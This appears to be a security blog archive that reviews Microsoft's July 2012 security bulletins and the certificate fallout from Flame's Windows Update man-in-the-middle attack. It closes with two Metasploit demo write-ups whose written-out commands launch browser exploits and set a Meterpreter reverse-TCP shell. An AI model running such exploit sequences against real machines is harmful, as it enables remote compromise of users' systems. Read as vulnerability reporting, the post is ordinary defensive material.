Tag Archives: Microsoft

Microsoft July 2012 Patch Tuesday Review

Microsoft has release, the 10 July 2012, during his July Patch Tuesday, two security advisories and nine security bulletins. On the two security advisories one is preventing a future 0day disclosure and on the nine security bulletins six of them are fixing publicly disclosed vulnerabilities.

Microsoft Security Advisory 2719662

MSA-2719662 recommend to disable as soon as possible Windows Sidebar and Gadgets available on Windows Vista and Windows 7. Possible execution of arbitrary code could be exploited through Windows Sidebar when running insecure Gadgets. KB-2719662 Fix IT solution will provide you a way to disable Windows Sidebar and Gadgets. Microsoft thanks Mickey Shkatov and Toby Kohlenberg for this MSA.

It is quiet surprising and disturbing that Microsoft recommend to disable Windows Sidebar and Gadgets how are used by a bunch of end users. The argument used to push the user to deactivate these stuffs is that Windows 8 will depreciate Sidebar and Gadgets. Why disable features from a supported version because the new version will no more use these features. You can compare this deactivation as disabling Widgets under Mac OS X. I think that the reason is quiet simple, Mickey Shkatov will present, at Black Hat US 2012 the 26 July, a session called “We have you by the Gadgets“. And I feel that the discovered vulnerabilities are quiet to long and hard to fix, and that Microsoft has decide to no more support Sidebar and Gadgets.

Microsoft Security Advisory 2728973

MSA-2728973 is the suite of the Flame malware attacks consequences, more Microsoft digital certificates have been moved to the “Untrusted Certificates Store”. The main reasons is that Microsoft is considering that the affected digital certificates are outside his secure storage practice, and that the RSA keys length are less than 2048 bits, how is considered as a best practice. KB-2728973 will correct these issues. Just remember that in Jun 2012 Microsoft had decide to block RSA keys that were under 1024 bits.

What is interesting is that these keys were considered not following Microsoft secure storage practice. Were these keys accessed by unnecessary custodians ? Were the keys not stored in an encrypted format or the key-encrypting keys not stored separately from data-encrypting keys ? Were the keys storage locations stored in multiple uncontrolled locations and forms ? Were the keys distributed in an insecure manner ? No answers 🙂

MS12-043 – Microsoft XML Core Services

MS12-043 security update, classified as Critical, allowing remote code execution, is the fix for CVE-2012-1889 found exploited in the wild in Jun 2012. This vulnerability was demonstrated by a Metasploit PoC the 15 Jun and then integrated into Blackhole exploit kit at the end of Jun.

MS12-044 – Cumulative Security Update for Internet Explorer

MS12-044 security update, classified as Critical, allowing remote code execution, is fixing two vulnerabilities CVE-2012-1522 and CVE-2012-1524. Both vulnerabilities were reported through VeriSign iDefense Labs coordinated vulnerability disclosure. CVE-2012-1522 was discovered by Jose A. Vazquez and CVE-2012-1524 discovered by Omair.

MS12-045 – Microsoft Data Access Components [MDAC]

MS12-045 security update, classified as Critical, allowing remote code execution, is fixing one vulnerability CVE-2012-1891. This vulnerability was reported through ZDI coordinated vulnerability disclosure.

MS12-046 – Visual Basic

MS12-046 security update, classified as Important, allowing remote code execution, is fixing one vulnerability CVE-2012-1854. This vulnerability has been discovered exploited in the wild since Mid-March ! The targeted attacks were focusing on Japanese organizations.

MS12-047 – Windows Kernel-Mode Drivers

MS12-047 security update, classified as Important, allowing escalation of privilege, is fixing two vulnerabilities CVE-2012-1890 and CVE-2012-1893. CVE-2012-1890 has been publicly disclosed and discovered by Nicolas Economou of Core Security Technologies and Qihoo 360 Security Center. CVE-2012-1893 was reported through Lufeng Li of Neusoft Corporation coordinated vulnerability disclosure. CVE-2012-1893 has a public exploit code but limited to local DoS. Some details of CVE-2012-1890 have been provided by Core Security Technologies.

MS12-048 – Windows Shell

MS12-048 security update, classified as Important, allowing remote code execution, is fixing one vulnerability CVE-2012-0175. This vulnerability was reported through Adi Cohen of IBM Security Systems coordinated vulnerability disclosure. Vulnerability details have been provided by Adi Cohen of IBM Security Systems.

MS12-049 – TLS

MS12-049 security update, classified as Important, allowing information disclosure, is fixing one vulnerability CVE-2012-1870. This vulnerability has been publicly disclosed.

MS12-050 – SharePoint

MS12-050 security update, classified as Important, allowing escalation of privilege, is fixing 6 vulnerabilities CVE-2012-1858CVE-2012-1859CVE-2012-1860CVE-2012-1861CVE-2012-1862 and CVE-2012-1863.

CVE-2012-1858 has been publicly disclosed by Adi Cohen of IBM Security Systems and could allow XSS attacks. A proof of concept code is available on IBM Security Systems.

CVE-2012-1859, CVE-2012-1860, CVE-2012-1861, CVE-2012-1862 and CVE-2012-1863 were reported through coordinated vulnerability disclosure.

MS12-051 – Microsoft Office for Mac

MS12-051 security update, classified as Important, allowing escalation of privilege, is fixing one vulnerability CVE-2012-1894. This vulnerability has been discovered exploited in the wild during targeted attacks against Tibet organizations.

update.microsoft.com SSL warnings due to certificate chain update

Flame malware, buzz of June 2012, had an interesting replication methods through Microsoft Windows Update service. The SNACK (NBNS spoofing) and MUNCH (Spoofing proxy detection and Windows Update request) Flame modules have allow man in the middle (MITM) attacks allowing distribution of forged Windows updates to the targets.

The MITM URLs were :

download.windowsupdate.com
download.microsoft.com
update.microsoft.com
www.update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com
www.download.windowsupdate.com
v5stats.windowsupdate.microsoft.com

The problem was that components of Flame were signed using a forged certificate that the attacker were able to create by exploiting a weakness in Microsoft Terminal Services, how allow users to sign code with Microsoft certificates.

Microsoft has issue a security advisory (MSA-2718704) and an update (KB-2718704) how will remove the untrusted certificates.

But since today, “Microsoft Root Certificate Authority” root certificate, “Microsoft Update Secure Server CA 1” intermediate certificate are not more trusted by majority of Internet browsers like Firefox, Chrome, Safari and Opera. The cause is that Microsoft has regenerate the Windows Update certificate chain. The chain of trust is broken (Qualys SSL LabsSSL Shopper SSL Checker) for www.update.microsoft.com and update.microsoft.com.

SSL certificates for the following domain names are also no more trusted, cause the chain of trust is broken:

www.update.microsoft.com
update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com

The SSL certificates associated to the following domain names are also no more trusted, cause they are pointing to a host not corresponding to the requested domain name (hosted on Akamai):

download.windowsupdate.com
download.microsoft.com
www.download.windowsupdate.com

With KB-2718704 installed on an up2date Windows XP SP3, only “www.update.microsoft.com” domain could be considered as trusted, if you use Internet Explorer.

But despite the installation of KB-2718704, the following domains are still invalid:

update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com
download.windowsupdate.com
download.microsoft.com

Here under some screenshots of different browsers and error messages.

[nggallery id=5]

MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-15

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

MSA-2719615
MS12-043
MS KB 2719615
CVE-2012-1889
OSVDB-82873

Affected version(s) :

Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0.

Tested on Windows XP Pro SP3 with :

Internet Explorer 6 (6.0.2900.5512.xpsp_sp3_gdr.11025-1629)

Description :

This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution. At the moment, this module only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.

Commands :

use exploit/windows/browser/msxml_get_definition_code_exec
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-13

PoC provided by :

Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited in the wild.

Commands :

use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid